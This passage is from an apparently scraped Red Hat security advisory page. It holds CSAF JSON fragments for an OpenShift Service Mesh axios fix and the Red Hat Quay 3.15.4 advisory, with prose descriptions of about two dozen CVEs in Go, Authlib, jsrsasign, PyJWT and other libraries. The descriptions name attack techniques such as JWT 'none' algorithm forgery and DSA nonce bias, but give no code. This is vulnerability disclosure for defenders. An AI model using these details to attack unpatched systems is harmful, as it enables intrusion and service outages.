"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:87cdc959362c3fb3e35930ad04fa589e5807bc3977d9e1964359b614ced0eb35_arm64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:e2f969be38741ff30e476e3a8f70eb60a3d030dcebcdb303269f39997c4acdf4_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:3107"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:3a78aade4c1a6fec8ff6c6ac6cec39644bd6bb592a3f65b6deaced893fa90f6d_s390x",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:3f096099daedca138492478a01802b4cf03a47a9b38086eceae2fef44ca03807_arm64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:e3726b5aca328047a8dfa518b2a7409f4d67b2152ec40f8a484618d86cd322b5_ppc64le",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:fcd8354b6a8282be890ab266e8ba84011f495f89f00a354e487cf09c73e4f6f5_amd64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:148cd3650dbfad079a80ff1b908aa6d992f7b2063aa4bda3687f04e1655b5e36_amd64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:4de053d77171a638e0d79deb10803f22e43fbc0d9b3e124eee90c1832346e271_s390x",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:87cdc959362c3fb3e35930ad04fa589e5807bc3977d9e1964359b614ced0eb35_arm64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:e2f969be38741ff30e476e3a8f70eb60a3d030dcebcdb303269f39997c4acdf4_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:3a78aade4c1a6fec8ff6c6ac6cec39644bd6bb592a3f65b6deaced893fa90f6d_s390x",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:3f096099daedca138492478a01802b4cf03a47a9b38086eceae2fef44ca03807_arm64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:e3726b5aca328047a8dfa518b2a7409f4d67b2152ec40f8a484618d86cd322b5_ppc64le",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:fcd8354b6a8282be890ab266e8ba84011f495f89f00a354e487cf09c73e4f6f5_amd64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:148cd3650dbfad079a80ff1b908aa6d992f7b2063aa4bda3687f04e1655b5e36_amd64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:4de053d77171a638e0d79deb10803f22e43fbc0d9b3e124eee90c1832346e271_s390x",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:87cdc959362c3fb3e35930ad04fa589e5807bc3977d9e1964359b614ced0eb35_arm64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:e2f969be38741ff30e476e3a8f70eb60a3d030dcebcdb303269f39997c4acdf4_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig"
}
]
}
RHSA-2026:6568
Vulnerability from csaf_redhat - Published: 2026-04-03 22:07 - Updated: 2026-04-16 11:09A flaw was found in the encoding/gob package of the Golang standard library. Calling Decoder.Decoding, a message that contains deeply nested structures, can cause a panic due to stack exhaustion. This is a follow-up to CVE-2022-30635.
A flaw was found in the x/crypto/ssh go library. Applications and libraries that misuse the ServerConfig.PublicKeyCallback callback may be susceptible to an authorization bypass. For example, an attacker may send public keys A and B and authenticate with A. PublicKeyCallback would be called only twice, first with A and then with B. A vulnerable application may then make authorization decisions based on key B, for which the attacker does not control the private key. The misuse of ServerConfig.PublicKeyCallback may cause an authorization bypass.
A flaw was found in golang.org/x/net/html. This flaw allows an attacker to craft input to the parse functions that would be processed non-linearly with respect to its length, resulting in extremely slow parsing. This issue can cause a denial of service.
A flaw was found in the net/url package in the Go standard library. The package does not enforce a limit on the number of unique query parameters it parses. A Go application using the net/http.Request.ParseForm method will try to process all parameters provided in the request. A specially crafted HTTP request containing a massive number of query parameters will cause the application to consume an excessive amount of memory, eventually causing the application to crash or become unresponsive, resulting in a denial of service.
A flaw was found in the archive/zip package in the Go standard library. A super-linear file name indexing algorithm is used in the first time a file in an archive is opened. A crafted zip archive containing a specific arrangement of file names can cause an excessive CPU and memory consumption. A Go application processing a malicious archive can become unresponsive or crash, resulting in a denial of service.
A flaw was found in golang. A remote attacker could exploit this vulnerability by providing a specially crafted certificate during the error string construction process within the `HostnameError.Error()` function. This flaw, caused by unbounded string concatenation, leads to excessive resource consumption. Successful exploitation can result in a denial of service (DoS) for the affected system.
A flaw was found in the crypto/tls component. This vulnerability occurs during Transport Layer Security (TLS) session resumption when certificate authority (CA) settings are modified between the initial and resumed handshakes. An attacker could exploit this to bypass certificate validation, allowing a client or server to establish a connection that should have been rejected. This could lead to an authentication bypass under specific conditions.
A flaw was found in Authlib, a Python library used for building OAuth and OpenID Connect servers. The cache-backed state and request-token storage within Authlib is not securely linked to the user's initiating session. This vulnerability allows a remote attacker to exploit a Cross-Site Request Forgery (CSRF) by obtaining a valid state, which can lead to unauthorized actions being performed on behalf of the user.
A flaw was found in ajv. When the $data option is enabled, the value of the pattern keyword is passed directly to the JavaScript RegExp() constructor without sufficient validation. An attacker able to supply a malicious regular expression pattern can trigger a ReDoS (Regular Expression Denial of Service), causing the application to become unresponsive and resulting in a denial of service.
A flaw was found in jsrsasign. A remote attacker could exploit this vulnerability by providing specially crafted zero or negative inputs to the bnModInverse function within the BigInteger.modInverse implementation. This could lead to an infinite loop, causing a permanent denial of service (DoS) by hanging the process.
A flaw was found in jsrsasign. An attacker can exploit an incomplete comparison vulnerability in the getRandomBigIntegerZeroToMax and getRandomBigIntegerMinToMax functions. By manipulating incorrect comparison checks, an attacker can bias the Digital Signature Algorithm (DSA) nonces during signature generation. This allows the attacker to recover the private key, leading to a critical security compromise.
A flaw was found in jsrsasign. An attacker can exploit improper verification of cryptographic signatures by supplying malicious domain parameters during the Digital Signature Algorithm (DSA) validation process. This allows the attacker to forge DSA signatures or X.509 certificates, which would then be accepted as legitimate, potentially leading to unauthorized access or data manipulation.
A flaw was found in jsrsasign. An attacker can exploit a missing cryptographic step in the Digital Signature Algorithm (DSA) signing process, specifically within the KJUR.crypto.DSA.signWithMessageHash function. By manipulating the signature generation to force specific values, the library emits an invalid signature without retrying. This vulnerability allows an attacker to recover the private key used for signing.
A flaw was found in jsrsasign. A remote attacker can exploit an incorrect conversion between numeric types by providing a negative exponent to the `modPow` function. This vulnerability can force the computation of incorrect modular inverses, which ultimately allows an attacker to bypass signature verification.
A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.
A flaw was found the Pillow Python imaging library. Providing a specially crafted PSD image may lead to an out-of-bounds write. This could potentially allow for arbitrary code execution or information disclosure.
A validation flaw has been discovered in the python cryptography package. This missing validation allows an attacker to provide a public key point P from a small-order subgroup. This can lead to security issues in various situations, such as the most commonly used signature verification (ECDSA) and shared key negotiation (ECDH). When the victim computes the shared secret as S = [victim_private_key]P via ECDH, this leaks information about victim_private_key mod (small_subgroup_order). For curves with cofactor > 1, this reveals the least significant bits of the private key. When these weak public keys are used in ECDSA , it's easy to forge signatures on the small subgroup. Only SECT curves are impacted by this.
A flaw was found in minimatch. A remote attacker could exploit this Regular Expression Denial of Service (ReDoS) vulnerability by providing a specially crafted glob pattern. This pattern, containing numerous consecutive wildcard characters, causes excessive processing and exponential backtracking in the regular expression engine. Successful exploitation leads to a Denial of Service (DoS), making the application unresponsive.
A flaw was found in pypdf. Processing a specially crafted PDF document, specifically with circular /Prev references in the cross-reference (xref) chain, can cause an infinite loop and a high consumption of CPU, resulting in a denial of service.
A flaw was found in minimatch. A remote attacker could exploit this vulnerability by providing a specially crafted glob expression with nested unbounded quantifiers. This could lead to catastrophic backtracking in the V8 JavaScript engine, causing the application to become unresponsive and resulting in a Denial of Service (DoS).
A flaw was found in Authlib, a Python library used for building OAuth and OpenID Connect (OIDC) servers. This vulnerability allows a remote attacker to bypass critical integrity checks in OIDC ID Tokens. Specifically, the library's internal hash verification logic fails open when encountering an unsupported cryptographic algorithm, accepting a forged ID Token as valid. This can lead to an authentication bypass, granting unauthorized access to systems relying on Authlib for OIDC authentication.
A flaw was found in Authlib, a Python library for building OAuth and OpenID Connect servers. A remote attacker can exploit this vulnerability by crafting a malicious JSON Web Token (JWT) with a "none" algorithm and an empty signature. This bypasses the expected signature verification, potentially allowing the attacker to forge tokens and gain unauthorized access or perform unauthorized actions within applications using Authlib.
A flaw was found in Immutable.js, a library for persistent immutable data structures. This vulnerability, known as Prototype Pollution, allows an attacker with low privileges to inject unwanted properties into core JavaScript object prototypes without user interaction. By manipulating specific APIs such as mergeDeep(), mergeDeepWith(), merge(), Map.toJS(), and Map.toObject(), a remote attacker could potentially execute arbitrary code or cause a denial of service (DoS).
A flaw was found in SVGO, an SVG (Scalable Vector Graphics) Optimizer. This vulnerability allows a remote attacker to cause a Denial of Service (DoS) by submitting a specially crafted XML file. The application's failure to properly guard against XML entity expansion or recursion can lead to the Node.js process consuming excessive memory and crashing.
An unbounded recursion flaw has been discovered in the pypi pyasn1 library. This uncontrolled recursion occurs when decoding ASN.1 data with deeply nested structures. An attacker can supply a crafted payload containing nested SEQUENCE (0x30) or SET (0x31) tags with Indefinite Length (0x80) markers. This forces the decoder to recursively call itself until the Python interpreter crashes with a RecursionError or consumes all available memory (OOM), crashing the host application.
A missing verification step has been discovered in PyJWT. PyJWT does not validate the crit (Critical) Header Parameter defined in RFC 7515 §4.1.11. When a JWS token contains a crit array listing extensions that PyJWT does not understand, the library accepts the token instead of rejecting it. This violates the MUST requirement in the RFC.
| URL | Category | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Red Hat Quay 3.15.4 is now available with bug fixes.",
"title": "Topic"
},
{
"category": "general",
"text": "Quay 3.15.4",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:6568",
"url": "https://access.redhat.com/errata/RHSA-2026:6568"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2024-34156",
"url": "https://access.redhat.com/security/cve/CVE-2024-34156"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2024-45337",
"url": "https://access.redhat.com/security/cve/CVE-2024-45337"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2024-45338",
"url": "https://access.redhat.com/security/cve/CVE-2024-45338"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-61726",
"url": "https://access.redhat.com/security/cve/CVE-2025-61726"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-61728",
"url": "https://access.redhat.com/security/cve/CVE-2025-61728"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-61729",
"url": "https://access.redhat.com/security/cve/CVE-2025-61729"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-68121",
"url": "https://access.redhat.com/security/cve/CVE-2025-68121"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-68158",
"url": "https://access.redhat.com/security/cve/CVE-2025-68158"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-69873",
"url": "https://access.redhat.com/security/cve/CVE-2025-69873"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25639",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25990",
"url": "https://access.redhat.com/security/cve/CVE-2026-25990"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-26007",
"url": "https://access.redhat.com/security/cve/CVE-2026-26007"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-26996",
"url": "https://access.redhat.com/security/cve/CVE-2026-26996"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-27628",
"url": "https://access.redhat.com/security/cve/CVE-2026-27628"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-27904",
"url": "https://access.redhat.com/security/cve/CVE-2026-27904"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-28498",
"url": "https://access.redhat.com/security/cve/CVE-2026-28498"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-28802",
"url": "https://access.redhat.com/security/cve/CVE-2026-28802"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-29063",
"url": "https://access.redhat.com/security/cve/CVE-2026-29063"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-29074",
"url": "https://access.redhat.com/security/cve/CVE-2026-29074"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-30922",
"url": "https://access.redhat.com/security/cve/CVE-2026-30922"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-32597",
"url": "https://access.redhat.com/security/cve/CVE-2026-32597"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-4598",
"url": "https://access.redhat.com/security/cve/CVE-2026-4598"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-4599",
"url": "https://access.redhat.com/security/cve/CVE-2026-4599"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-4600",
"url": "https://access.redhat.com/security/cve/CVE-2026-4600"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-4601",
"url": "https://access.redhat.com/security/cve/CVE-2026-4601"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-4602",
"url": "https://access.redhat.com/security/cve/CVE-2026-4602"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_6568.json"
}
],
"title": "Red Hat Security Advisory: Red Hat Quay 3.15.4",
"tracking": {
"current_release_date": "2026-04-16T11:09:18+00:00",
"generator": {
"date": "2026-04-16T11:09:18+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.7.5"
}
},
"id": "RHSA-2026:6568",
"initial_release_date": "2026-04-03T22:07:28+00:00",
"revision_history": [
{
"date": "2026-04-03T22:07:28+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-04-03T22:07:35+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-04-16T11:09:18+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Quay 3.15",
"product": {
"name": "Red Hat Quay 3.15",
"product_id": "Red Hat Quay 3.15",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:quay:3.15::el8"
}
}
}
],
"category": "product_family",
"name": "Red Hat Quay"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"product_id": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-container-security-operator-bundle@sha256%3A25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1774980222"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"product_id": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-container-security-operator-rhel8@sha256%3A3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1774979159"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"product_id": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-bridge-operator-bundle@sha256%3Aebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1774980224"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"product_id": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-bridge-operator-rhel8@sha256%3Aa1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1774979227"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"product_id": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-builder-qemu-rhcos-rhel8@sha256%3A7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1775183105"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"product_id": "registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-builder-rhel8@sha256%3A9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1775227789"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"product": {
"name": "registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"product_id": "registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"product_identification_helper": {
"purl": "pkg:oci/clair-rhel8@sha256%3A35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1775249999"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"product_id": "registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-operator-bundle@sha256%3Adec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1775250489"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"product_id": "registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-operator-rhel8@sha256%3A26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1774984603"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64",
"product_id": "registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-rhel8@sha256%3Ac72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1775169219"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"product": {
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"product_id": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"product_identification_helper": {
